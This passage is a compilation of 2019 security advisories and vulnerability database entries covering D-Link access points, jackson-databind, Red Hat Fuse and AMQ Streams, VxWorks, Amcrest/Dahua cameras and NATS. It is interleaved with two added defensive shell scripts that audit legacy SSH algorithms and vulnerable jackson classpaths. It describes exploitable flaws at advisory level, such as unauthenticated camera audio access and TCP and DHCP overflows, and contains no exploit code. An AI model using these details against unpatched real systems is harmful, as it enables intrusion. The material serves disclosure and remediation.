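            *" $algo "*) echo "$algo"; found=1 ;;
        esac
    done
    [ "$found" -eq 0 ]
}

# audit_ssh KEX_LIST CIPHER_LIST MAC_LIST: one FAIL line per legacy algorithm;
# returns 1 if anything failed so it can gate a build or a scan.
audit_ssh() {
    rc=0
    for pair in "kex:$1" "cipher:$2" "mac:$3"; do
        kind=${pair%%:*}; list=${pair#*:}
        for algo in $(weak_in "$list"); do
            echo "FAIL $kind: $algo"; rc=1
        done
    done
    return $rc
}

# Constructed sample: a server that, like the AP in the PoC, still accepts
# group1-sha1 next to modern algorithms.
SAMPLE_KEX="curve25519-sha256,diffie-hellman-group14-sha256,diffie-hellman-group1-sha1"
SAMPLE_CIPHERS="aes128-ctr,aes256-gcm@openssh.com,3des-cbc"
SAMPLE_MACS="hmac-sha2-256,hmac-sha1-96"
audit_ssh "$SAMPLE_KEX" "$SAMPLE_CIPHERS" "$SAMPLE_MACS" \
    || echo "server offers legacy SSH algorithms"
```

On the sample input this prints three FAIL lines (one KEX, one cipher, one MAC). The remediation on a device like this AP is a firmware update that drops the legacy names from the server's offered lists; a client-side `KexAlgorithms` restriction only protects the one client that sets it.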
## Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this
Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list
## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
## About me - pwn.sandstorm@gmail.com
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources
| VAR-201907-0116 | CVE-2019-5457 | Min-http-server cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in min-http-server (all versions) allows an attacker with access to the server file system to execute arbitrary JavaScript code in the victim's browser. min-http-server contains a cross-site scripting vulnerability. Information may be obtained and altered. min-http-server is a lightweight HTTP static resource server. The vulnerability stems from insufficient validation of client-supplied data by the web application; an attacker could exploit it to execute client-side code
| VAR-201907-0115 | CVE-2019-5456 | UniFi Controller Vulnerabilities related to certificate and password management |
CVSS V2: 4.3 CVSS V3: 8.1 Severity: HIGH |
SMTP MITM refers to a malicious actor setting up an SMTP proxy server between the UniFi Controller version <= 5.10.21 and their actual SMTP server to record their SMTP credentials for malicious use later. UniFi Controller contains vulnerabilities related to certificate and password management. Information may be obtained, information may be altered, and service operation may be disrupted (DoS)
| VAR-201907-0117 | CVE-2019-5458 | Http-file-server cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: 5.4 Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in http-file-server (all versions) allows an attacker with access to the server file system to execute arbitrary JavaScript code in the victim's browser. http-file-server contains a cross-site scripting vulnerability. Information may be obtained and falsified. http-file-server is an HTTP file server. The vulnerability stems from insufficient validation of client-supplied data by the web application; an attacker could exploit it to execute client-side code
| VAR-201907-0769 | CVE-2019-14439 | FasterXML jackson-databind Vulnerable to information disclosure |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath. FasterXML jackson-databind contains an information disclosure vulnerability. Information may be obtained. FasterXML Jackson is a Java data-processing toolkit developed by the American company FasterXML; jackson-databind is its data-binding component. A security vulnerability exists in FasterXML jackson-databind 2.x versions prior to 2.9.9.2. Currently there is no further information about this vulnerability; please keep an eye on CNNVD or vendor announcements.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
- -------------------------------------------------------------------------
Debian Security Advisory DSA-4542-1 security@debian.org
https://www.debian.org/security/ Sebastien Delafond
October 06, 2019 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : jackson-databind
CVE ID : CVE-2019-12384 CVE-2019-14439 CVE-2019-14540 CVE-2019-16335
CVE-2019-16942 CVE-2019-16943
Debian Bug : 941530 940498 933393 930750
It was discovered that jackson-databind, a Java library used to parse
JSON and other data formats, did not properly validate user input
before attempting deserialization. This allowed an attacker providing
maliciously crafted input to perform code execution, or read arbitrary
files on the server.
For the oldstable distribution (stretch), these problems have been fixed
in version 2.8.6-1+deb9u6.
For the stable distribution (buster), these problems have been fixed in
version 2.9.8-3+deb10u1.
We recommend that you upgrade your jackson-databind packages.
For the detailed security status of jackson-databind please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/jackson-databind
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAl2ZpPgACgkQEL6Jg/PV
nWTg1QgArRk3fUf/k14rPha6GlJnWtRu2tZli07NzxtebAI2Ra8vKHkv1F3xSBjx
tnauaRmJXonoU7t1TU51O/F7xkxX10NXym3YyrJ4+5ac6OtGmstSkMW1CmEiS8Z7
RaQQqY8GTJe5VTjiPon+lvdxyoFIDbp3nUGj8sshrULtKQX3Bjc9dotXyu0M3/7o
QjsFAOLpytx/nMS1O93rqHuO381plbaAi5EYgAPv737tV8lVH3li56FYTKRMVjEg
BkBpkaDGWhqoYvTu4WviyCyon0V5PgtHuD8SkN/39QqiYoDCzfa0xPjZ3a44G0kR
C6qF8E4WIw465wLrRLCuuybG6/ZrzA==
=Gifd
-----END PGP SIGNATURE-----
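Both the VARIoT summary and the Debian text above pin the exposure to a pairing: a jackson-databind 2.x older than 2.9.9.2 on a service that also ships logback, with Default Typing enabled on an externally reachable endpoint. The following is an added example, not Debian's or FasterXML's code, that checks the first two conditions over a build's classpath. It cannot see whether Default Typing is enabled, so a hit means "upgrade now", not proof of exposure. The jar paths are constructed sample input, shaped like the output of `mvn dependency:build-classpath` with the `:` separators turned into spaces.

```sh
#!/bin/sh
# Added example, not Debian's or FasterXML's code: flag a Java classpath that
# pairs jackson-databind 2.x < 2.9.9.2 with a logback jar, the combination the
# CVE-2019-14439 description requires. Sample paths below are constructed.

FIXED_JACKSON=2.9.9.2     # first fixed 2.x release named in the advisory

# version_lt A B: exit 0 when dotted version A is numerically lower than B
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = na > nb ? na : nb
        for (i = 1; i <= n; i++) {
            p = (i <= na) ? x[i] + 0 : 0     # missing components count as 0
            q = (i <= nb) ? y[i] + 0 : 0
            if (p < q) exit 0
            if (p > q) exit 1
        }
        exit 1                                # equal is not lower
    }'
}

# jar_version PATH/name-1.2.3.jar -> 1.2.3 (plain numeric Maven versions only;
# a -SNAPSHOT or classifier suffix is printed unchanged and will not compare)
jar_version() {
    basename "$1" .jar | sed 's/^.*-\([0-9][0-9.]*\)$/\1/'
}

# audit_classpath "jar1 jar2 ...": prints a verdict, returns 1 when vulnerable
audit_classpath() {
    jackson=""; logback=0
    for jar in $1; do
        case $(basename "$jar") in
            jackson-databind-*.jar)                   jackson=$(jar_version "$jar") ;;
            logback-core-*.jar|logback-classic-*.jar) logback=1 ;;
        esac
    done
    case $jackson in
        2.*) if version_lt "$jackson" "$FIXED_JACKSON" && [ "$logback" -eq 1 ]; then
                 echo "VULNERABLE: jackson-databind $jackson < $FIXED_JACKSON with logback on the classpath"
                 return 1
             fi ;;
    esac
    echo "OK: jackson-databind ${jackson:-absent}, logback=$logback"
    return 0
}

# Constructed sample classpath
SAMPLE_CP="lib/jackson-core-2.9.8.jar lib/jackson-databind-2.9.8.jar lib/logback-core-1.2.3.jar"
audit_classpath "$SAMPLE_CP" || true
```

A classpath scan like this is the supply-chain half of the check; the code half is grepping the service for `enableDefaultTyping` or `activateDefaultTyping` and `@JsonTypeInfo` on externally deserialised types, because upgrading jackson-databind closes this gadget but not the next one that Default Typing admits.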
The purpose of this text-only errata is to inform you about the security
issues fixed in this release.
Security Fix(es):
* HTTP/2: flood using PING frames results in unbounded memory growth
(CVE-2019-9512)
* HTTP/2: flood using PRIORITY frames results in excessive resource
consumption (CVE-2019-9513)
* HTTP/2: flood using HEADERS frames results in unbounded memory growth
(CVE-2019-9514)
* HTTP/2: flood using SETTINGS frames results in unbounded memory growth
(CVE-2019-9515)
* HTTP/2: 0-length headers lead to denial of service (CVE-2019-9516)
* HTTP/2: request for large response leads to denial of service
(CVE-2019-9517)
* HTTP/2: flood using empty frames results in excessive resource
consumption (CVE-2019-9518)
* infinispan: invokeAccessibly method from ReflectionUtil class allows to
invoke private methods (CVE-2019-10174)
* spring-security-core: mishandling of user passwords allows logging in
with a password of NULL (CVE-2019-11272)
* jackson-databind: failure to block the logback-core class from
polymorphic deserialization leading to remote code execution
(CVE-2019-12384)
* jackson-databind: default typing mishandling leading to remote code
execution (CVE-2019-14379)
* xmlrpc: Deserialization of server-side exception from faultCause in
XMLRPC error response (CVE-2019-17570)
* js-jquery: Cross-site scripting via cross-domain ajax requests
(CVE-2015-9251)
* logback: Serialization vulnerability in SocketServer and
ServerSocketReceiver (CVE-2017-5929)
* js-jquery: XSS in responses from cross-origin ajax requests
(CVE-2017-16012)
* apache-commons-compress: ZipArchiveInputStream.read() fails to identify
correct EOF allowing for DoS via crafted zip (CVE-2018-11771)
* spring-data-api: potential information disclosure through maliciously
crafted example value in ExampleMatcher (CVE-2019-3802)
* undertow: leak credentials to log files
UndertowLogger.REQUEST_LOGGER.undertowRequestFailed (CVE-2019-3888)
* shiro: Cookie padding oracle vulnerability with default configuration
(CVE-2019-12422)
* jackson-databind: polymorphic typing issue allows attacker to read
arbitrary local files on the server via crafted JSON message.
Installation instructions are available from the Fuse 7.6.0 product
documentation page:
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.6/
4. Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 js-jquery: Cross-site scripting via cross-domain ajax requests
1432858 - CVE-2017-5929 logback: Serialization vulnerability in SocketServer and ServerSocketReceiver
1591854 - CVE-2017-16012 js-jquery: XSS in responses from cross-origin ajax requests
1618573 - CVE-2018-11771 apache-commons-compress: ZipArchiveInputStream.read() fails to identify correct EOF allowing for DoS via crafted zip
1643043 - CVE-2018-15756 springframework: DoS Attack via Range Requests
1693777 - CVE-2019-3888 undertow: leak credentials to log files UndertowLogger.REQUEST_LOGGER.undertowRequestFailed
1703469 - CVE-2019-10174 infinispan: invokeAccessibly method from ReflectionUtil class allows to invoke private methods
1709860 - CVE-2019-5427 c3p0: loading XML configuration leads to denial of service
1713068 - CVE-2019-10184 undertow: Information leak in requests for directories without trailing slashes
1725795 - CVE-2019-12814 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server via crafted JSON message.
1725807 - CVE-2019-12384 jackson-databind: failure to block the logback-core class from polymorphic deserialization leading to remote code execution
1728993 - CVE-2019-11272 spring-security-core: mishandling of user passwords allows logging in with a password of NULL
1730316 - CVE-2019-3802 spring-data-api: potential information disclosure through maliciously crafted example value in ExampleMatcher
1735645 - CVE-2019-9512 HTTP/2: flood using PING frames results in unbounded memory growth
1735741 - CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption
1735744 - CVE-2019-9514 HTTP/2: flood using HEADERS frames results in unbounded memory growth
1735745 - CVE-2019-9515 HTTP/2: flood using SETTINGS frames results in unbounded memory growth
1735749 - CVE-2019-9518 HTTP/2: flood using empty frames results in excessive resource consumption
1737517 - CVE-2019-14379 jackson-databind: default typing mishandling leading to remote code execution
1741864 - CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service
1741868 - CVE-2019-9517 HTTP/2: request for large response leads to denial of service
1752962 - CVE-2019-14439 jackson-databind: Polymorphic typing issue related to logback/JNDI
1774726 - CVE-2019-12422 shiro: Cookie padding oracle vulnerability with default configuration
1775193 - CVE-2019-17570 xmlrpc: Deserialization of server-side exception from faultCause in XMLRPC error response
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat AMQ Streams 1.3.0 release and security update
Advisory ID: RHSA-2019:3200-01
Product: Red Hat JBoss AMQ
Advisory URL: https://access.redhat.com/errata/RHSA-2019:3200
Issue date: 2019-10-24
Keywords: amq,messaging,integration
CVE Names: CVE-2019-14439 CVE-2019-14540 CVE-2019-16335
CVE-2019-17267
=====================================================================
1. Summary:
Red Hat AMQ Streams 1.3.0 is now available from the Red Hat Customer
Portal.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Red Hat AMQ Streams, based on the Apache Kafka project, offers a
distributed backbone that allows microservices and other applications to
share data with extremely high throughput and extremely low latency.
This release of Red Hat AMQ Streams 1.3.0 serves as a replacement for Red
Hat AMQ Streams 1.2.0, and includes security and bug fixes, and
enhancements. For further information, refer to the release notes linked to
in the References section.
Security Fix(es):
* jackson-databind: polymorphic typing issue related to
com.zaxxer.hikari.HikariConfig (CVE-2019-14540)
* jackson-databind: polymorphic typing issue related to
com.zaxxer.hikari.HikariDataSource (CVE-2019-16335)
* jackson-databind: Polymorphic typing issue related to logback/JNDI
(CVE-2019-14439)
* jackson-databind: Serialization gadgets in classes of the ehcache package
(CVE-2019-17267)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
3. Solution:
Before applying the update, back up your existing installation, including
all applications, configuration files, databases and database settings, and
so on.
The References section of this erratum contains a download link (you must
log in to download the update).
4. References:
https://access.redhat.com/security/cve/CVE-2019-14439
https://access.redhat.com/security/cve/CVE-2019-14540
https://access.redhat.com/security/cve/CVE-2019-16335
https://access.redhat.com/security/cve/CVE-2019-17267
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=jboss.amq.streams&downloadType=distributions&version=1.3.0
https://access.redhat.com/products/red-hat-amq#streams
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBXbFsi9zjgjWX9erEAQjT6Q/+JDAvWImEvDZuahMo6spY5gcZgEn/A2KH
7JuCSBx+s0gW9NEIVp0emqW0dguTMmvQCqOhskE91kis6C9oJORlRPz7HqYaOGve
7pf0fwwQREb0VRYqXtXIYgQv+ugU+/m5bSaniSvO0S3iPLqdiANV/r7qoDqPPtOH
dkVthpaYgtx7F4myG8DvVoAUzCfpxKsKdol/riYnp/rhmnEVrJAH5EuVbGtECj7p
f4Qv+MSd2ebO0oDe9Lqjjv3bc7RTwdRsCZywfwHLQSC7S2vJyiXFGCtdS9fYBdgb
obNjp8G+2hZ+prO0Xg+RfKeT6/3aUK5hmV/Az5Ip4AeP0a60WvBz+yhU5wd1WRX9
dxEb72pTG2r1ctHvYBTT3Qn2qB3fm0IRI9HfG7sRWtTXEGO2l9FN/zSDshockiJa
jM26U3ePwqpcl6QAAe9HJBAzTcxw2Gf7ubyvmsizyueFddAmqOP+PnVqxMRntXrH
A1sPw/Y06KATBUxkGpEY4KriJSiJU1Z2QmiAMlOa4Z+D5fAJh73BWZnLoYyPoLac
jYg91xqmw2692d+ZAEmnBZRiWYY7IfqeesM+KzIuGYpsk2c8imXRv6/+KpqAW45l
SgloiZiayL0WlYmF2+WUvhtH/lmzpfOnI96OJFruKHusAEVLgxj9kic5G02JteP+
hgNap4AeRy4=
=W3XT
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201908-0705 | CVE-2019-12264 | Wind River Systems VxWorks Parameter injection vulnerability |
CVSS V2: 4.8 CVSS V3: 7.1 Severity: HIGH |
Wind River VxWorks 6.6, 6.7, 6.8, 6.9.3, 6.9.4, and Vx7 has Incorrect Access Control in IPv4 assignment by the ipdhcpc DHCP client component. Wind River VxWorks contains an argument injection or modification vulnerability. Information may be tampered with and service operation interrupted (DoS). Wind River Systems VxWorks is an embedded real-time operating system (RTOS) from Wind River Systems. The vulnerability stems from building command parameters from external input data: the product does not properly filter special characters in those parameters, and an attacker could exploit this to execute an illegal command
| VAR-201908-0714 | CVE-2019-12257 | Wind River VxWorks Buffer error vulnerability |
CVSS V2: 5.8 CVSS V3: 8.8 Severity: HIGH |
Wind River VxWorks 6.6 through 6.9 has a Buffer Overflow in the DHCP client component. There is an IPNET security vulnerability: Heap overflow in DHCP Offer/ACK parsing inside ipdhcpc. Wind River VxWorks Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Wind River Systems VxWorks is an embedded real-time operating system (RTOS) from Wind River Systems. An attacker could exploit the vulnerability to overwrite the heap and execute code. The following products and versions are affected: Wind River Systems VxWorks Version 6.9, Version 6.8, Version 6.7, Version 6.6
| VAR-201907-0246 | CVE-2019-3948 | Amcrest IP2M-841B IP Camera firmware Authentication vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The Amcrest IP2M-841B V2.520.AC00.18.R, Dahua IPC-XXBXX V2.622.0000000.9.R, Dahua IPC HX5X3X and HX4X3X V2.800.0000008.0.R, Dahua DH-IPC HX883X and DH-IPC-HX863X V2.622.0000000.7.R, Dahua DH-SD4XXXXX V2.623.0000000.7.R, Dahua DH-SD5XXXXX V2.623.0000000.1.R, Dahua DH-SD6XXXXX V2.640.0000000.2.R and V2.623.0000000.1.R, Dahua NVR5XX-4KS2 V3.216.0000006.0.R, Dahua NVR4XXX-4KS2 V3.216.0000006.0.R, and NVR2XXX-4KS2 do not require authentication to access the HTTP endpoint /videotalk. An unauthenticated, remote person can connect to this endpoint and potentially listen to the audio of the capturing device. Amcrest IP2M-841B IP Camera firmware contains an authentication vulnerability. Information may be obtained. The Amcrest IP2M-841B is an IP camera from Amcrest
| VAR-201907-0363 | CVE-2019-13126 | NATS Server Integer overflow vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
An integer overflow in NATS Server before 2.0.2 allows a remote attacker to crash the server by sending a crafted request. If authentication is enabled, then the remote attacker must have first authenticated. NATS Server is an open source messaging system. This system is mainly used for cloud-native applications, IoT messaging, and microservice architecture. An input validation error vulnerability exists in NATS Server version 2.0.0
| VAR-201908-0712 | CVE-2019-12255 | Wind River Systems VxWorks Numeric error vulnerability |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
Wind River VxWorks has a Buffer Overflow in the TCP component (issue 1 of 4). This is an IPNET security vulnerability: a TCP Urgent Pointer of 0 leads to an integer underflow. Wind River VxWorks contains a buffer error vulnerability. Information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). Wind River Systems VxWorks is an embedded real-time operating system (RTOS) from Wind River Systems. This vulnerability stems from incorrect verification of data boundaries during memory operations, resulting in incorrect reads and writes to other associated memory locations; attackers can exploit it to cause a buffer overflow or heap overflow. The following products and versions are affected: Wind River Systems VxWorks Version 6.9, Version 6.8, Version 6.7, Version 6.6. An unauthenticated, remote attacker could exploit the vulnerability to cause a denial of service (DoS) condition or execute arbitrary code on a targeted system